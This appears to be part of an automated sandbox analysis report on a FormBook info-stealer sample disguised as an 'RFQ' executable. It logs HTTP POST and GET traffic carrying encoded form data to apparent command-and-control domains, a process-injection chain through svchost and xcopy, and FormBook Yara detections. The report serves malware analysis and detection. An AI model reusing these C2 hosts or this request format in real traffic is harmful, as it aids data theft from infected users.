                                                                                                                                          Data Raw: 6e 38 43 30 3d 6f 34 4c 30 32 56 34 59 38 69 43 6b 64 69 45 4f 49 4c 4f 6e 70 70 56 76 38 75 36 4d 36 73 31 56 79 63 64 68 6b 32 68 76 7a 79 30 4d 32 6c 69 51 4b 33 55 4b 7a 59 2b 50 2b 4f 6a 67 52 41 4f 68 38 39 43 30 73 36 4a 78 39 55 75 45 4b 6e 50 36 37 62 57 4a 75 6c 48 30 68 44 62 56 4a 63 59 6e 6c 4a 4a 66 41 61 59 4f 70 70 2f 67 32 71 4d 6a 50 50 4d 4e 4d 65 72 4b 6a 7a 4d 53 73 4e 6d 57 78 47 57 37 68 63 51 43 4f 4f 2b 34 59 32 48 59 37 4b 71 69 56 4d 2b 67 32 51 54 57 4f 7a 68 61 32 67 59 77 39 57 41 65 78 70 2f 43 73 62 58 45 72 56 6a 38 65 66 4a 75 65 54 4c 75 71 54 51 75 76 6e 5a 4f 62 7a 55 2f 42 5a 7a 50 39 4a 4c 73 35 61 58 4c 36 74 55 3d
                                                                                                                                          Data Ascii: n8C0=o4L02V4Y8iCkdiEOILOnppVv8u6M6s1Vycdhk2hvzy0M2liQK3UKzY+P+OjgRAOh89C0s6Jx9UuEKnP67bWJulH0hDbVJcYnlJJfAaYOpp/g2qMjPPMNMerKjzMSsNmWxGW7hcQCOO+4Y2HY7KqiVM+g2QTWOzha2gYw9WAexp/CsbXErVj8efJueTLuqTQuvnZObzU/BZzP9JLs5aXL6tU=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          51192.168.2.4500533.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:31:21.603451967 CET10778OUTPOST /37zt/ HTTP/1.1
                                                                                                                                          Host: www.robotcurut.xyz
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.robotcurut.xyz
                                                                                                                                          Referer: http://www.robotcurut.xyz/37zt/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 6f 34 4c 30 32 56 34 59 38 69 43 6b 64 69 45 4f 49 4c 4f 6e 70 70 56 76 38 75 36 4d 36 73 31 56 79 63 64 68 6b 32 68 76 7a 79 38 4d 32 54 2b 51 59 47 55 4b 31 6f 2b 50 77 75 6a 74 52 41 4f 67 38 35 57 34 73 36 46 48 39 57 57 45 51 45 58 36 72 71 57 4a 30 31 48 30 71 6a 62 42 57 4d 59 79 6c 4a 5a 44 41 65 30 4f 70 70 2f 67 32 72 38 6a 62 4b 73 4e 4b 65 72 4a 71 54 4d 4f 36 39 6e 4a 78 47 75 52 68 63 55 53 50 2f 65 34 66 57 58 59 39 35 43 69 64 4d 2b 59 31 51 54 77 4f 7a 6c 46 32 68 78 4a 39 55 68 35 78 75 50 43 38 50 47 64 2f 78 79 68 46 5a 64 31 45 6b 2f 5a 6a 77 38 37 72 6c 70 49 55 69 59 64 61 4a 37 66 33 49 2b 54 73 71 79 55 6d 59 68 59 46 31 58 2b 44 65 41 6e 70 6c 50 58 49 34 2b 69 2b 73 6c 35 2b 67 6d 4a 69 45 45 43 6a 6e 46 30 77 72 79 62 73 74 6b 75 6a 4b 66 4a 4a 37 52 57 35 74 72 38 35 44 59 42 56 35 54 47 76 77 47 64 7a 31 51 52 36 46 56 62 4e 50 6a 51 72 45 59 2b 6a 49 7a 65 78 66 52 75 35 43 78 7a 38 6d 4a 50 47 55 7a 50 71 54 6a 5a 34 78 79 41 33 72 52 7a 43 76 45 56 65 [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=o4L02V4Y8iCkdiEOILOnppVv8u6M6s1Vycdhk2hvzy8M2T+QYGUK1o+PwujtRAOg85W4s6FH9WWEQEX6rqWJ01H0qjbBWMYylJZDAe0Opp/g2r8jbKsNKerJqTMO69nJxGuRhcUSP/e4fWXY95CidM+Y1QTwOzlF2hxJ9Uh5xuPC8PGd/xyhFZd1Ek/Zjw87rlpIUiYdaJ7f3I+TsqyUmYhYF1X+DeAnplPXI4+i+sl5+gmJiEECjnF0wrybstkujKfJJ7RW5tr85DYBV5TGvwGdz1QR6FVbNPjQrEY+jIzexfRu5Cxz8mJPGUzPqTjZ4xyA3rRzCvEVe2X9fE0ErQmup5GWinKdRC9C7VZnBO2H4yGFP60QLaml8EB+1P6IUtglUby130AH4g1jFe/iif+Ng/S59+kkXGeyshi9INf+W1Nxho5XC0rq0UQTSL0weoKJGF2khoDwCvYuOdO8aXamdPYiMqvDV8c01GnrzWW8BBS5L1Bvc+9lxezFetu+LI+jmF8zGSQz/FW74oF2+9SpeUOM2+pnk8/f7JTQjWuZPp4HtBiowIVGtny6s6+jsBtMuOBccrNbE0lej3c1p7RW18nmqhPMGSrUFPZ7Pymc0iWcQ4pxjzGhDBItHTkO/zzmh96rC/T1wgfY3QmcTMhoX6VFbQI2yfQqqk0gdofGHCan5+ic3kJiA7EGw3e7x+rNrRkJd76+xY07IE3OIrqN5Qg7lqVSnfXisLoErowVkKkx5ffw20NtfmaYmis5vz2wHm/kfKD/TfERIefv0Y3ukXpxAtL3Ov+jweKSbKiGFSFBGEvRa29ICu9J77h3hd8aVT6RYVLCaj5DUB6TmUpSCYID3RkD6Wo6eKzVb2+oH9FaZcHKi/BD9w0TBb9ZpeWgqlfr69rT1q+//cynohonLKJjpiAL5TalVbTyGEVcYwOTvJjpognAyn8ElfECTfur+xHhKv1Z1gwX7260bYZFSOIWxQibFfrXDlumIM/kBhL [TRUNCATED]


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          52192.168.2.4500543.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:31:24.146698952 CET413OUTGET /37zt/?vva=cTUXfXqHQ4cd-Hh0&n8C0=l6jU1h09iQqjeSwPKYuz1pBb0o/w06lG68U0kV9W0wdPoyedT2IMzaad+ev/QDzf4MPOn9Ve63r/J03J+pi+jATvmQ+eVJsL4Kp9LpF4hq/1uKcTc59FKYc= HTTP/1.1
                                                                                                                                          Host: www.robotcurut.xyz
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:31:24.770987988 CET401INHTTP/1.1 200 OK
                                                                                                                                          Server: openresty
                                                                                                                                          Date: Thu, 14 Nov 2024 15:31:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 261
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 76 61 3d 63 54 55 58 66 58 71 48 51 34 63 64 2d 48 68 30 26 6e 38 43 30 3d 6c 36 6a 55 31 68 30 39 69 51 71 6a 65 53 77 50 4b 59 75 7a 31 70 42 62 30 6f 2f 77 30 36 6c 47 36 38 55 30 6b 56 39 57 30 77 64 50 6f 79 65 64 54 32 49 4d 7a 61 61 64 2b 65 76 2f 51 44 7a 66 34 4d 50 4f 6e 39 56 65 36 33 72 2f 4a 30 33 4a 2b 70 69 2b 6a 41 54 76 6d 51 2b 65 56 4a 73 4c 34 4b 70 39 4c 70 46 34 68 71 2f 31 75 4b 63 54 63 35 39 46 4b 59 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vva=cTUXfXqHQ4cd-Hh0&n8C0=l6jU1h09iQqjeSwPKYuz1pBb0o/w06lG68U0kV9W0wdPoyedT2IMzaad+ev/QDzf4MPOn9Ve63r/J03J+pi+jATvmQ+eVJsL4Kp9LpF4hq/1uKcTc59FKYc="}</script></head></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          53192.168.2.45005513.248.169.4880
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:31:30.483170033 CET670OUTPOST /v0jl/ HTTP/1.1
                                                                                                                                          Host: www.hopeisa.live
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.hopeisa.live
                                                                                                                                          Referer: http://www.hopeisa.live/v0jl/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 70 32 57 6e 32 47 4c 2f 41 4c 49 2b 53 65 61 55 2b 4b 62 77 4a 63 43 50 4e 55 2f 6d 64 37 46 6e 66 6f 64 44 45 74 37 38 44 4d 58 65 67 68 47 78 68 51 6d 38 6d 72 56 45 7a 55 58 41 66 67 4d 4c 74 62 7a 4b 52 48 59 48 6d 5a 6d 6a 31 49 50 6a 4a 38 5a 2b 72 52 47 47 78 42 44 65 56 37 38 43 76 4f 53 31 53 64 52 39 41 31 69 78 58 77 63 44 46 57 51 6a 65 72 41 6b 44 79 70 65 41 70 37 49 37 55 58 65 62 39 43 47 53 47 48 42 58 46 46 50 52 6b 74 61 69 30 44 6b 59 32 42 62 32 32 61 34 45 32 44 59 53 4f 71 73 33 68 73 73 57 6e 2f 4b 4c 68 38 4a 54 4d 76 39 39 71 58 57 34 4f 66 76 2f 77 3d 3d
                                                                                                                                          Data Ascii: n8C0=p2Wn2GL/ALI+SeaU+KbwJcCPNU/md7FnfodDEt78DMXeghGxhQm8mrVEzUXAfgMLtbzKRHYHmZmj1IPjJ8Z+rRGGxBDeV78CvOS1SdR9A1ixXwcDFWQjerAkDypeAp7I7UXeb9CGSGHBXFFPRktai0DkY2Bb22a4E2DYSOqs3hssWn/KLh8JTMv99qXW4Ofv/w==


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:10:27:22
                                                                                                                                          Start date:14/11/2024
                                                                                                                                          Path:C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:964'785 bytes
                                                                                                                                          MD5 hash:1087C8D5903EA811BAB4D2298E756592
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:10:27:23
                                                                                                                                          Start date:14/11/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"
                                                                                                                                          Imagebase:0x230000
                                                                                                                                          File size:46'504 bytes
                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1959351183.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1960343452.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1963116108.0000000007090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:10:27:41
                                                                                                                                          Start date:14/11/2024
                                                                                                                                          Path:C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe"
                                                                                                                                          Imagebase:0xf30000
                                                                                                                                          File size:140'800 bytes
                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4152909168.0000000002A60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:10:27:44
                                                                                                                                          Start date:14/11/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\xcopy.exe"
                                                                                                                                          Imagebase:0x260000
                                                                                                                                          File size:43'520 bytes
                                                                                                                                          MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4153059351.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4152996969.0000000003530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4151604059.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:10:27:56
                                                                                                                                          Start date:14/11/2024
                                                                                                                                          Path:C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe"
                                                                                                                                          Imagebase:0xf30000
                                                                                                                                          File size:140'800 bytes
                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4154874640.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:10:28:08
                                                                                                                                          Start date:14/11/2024
                                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                          Imagebase:0x7ff6bf500000
                                                                                                                                          File size:676'768 bytes
                                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Disassembly

                                                                                                                                          No disassembly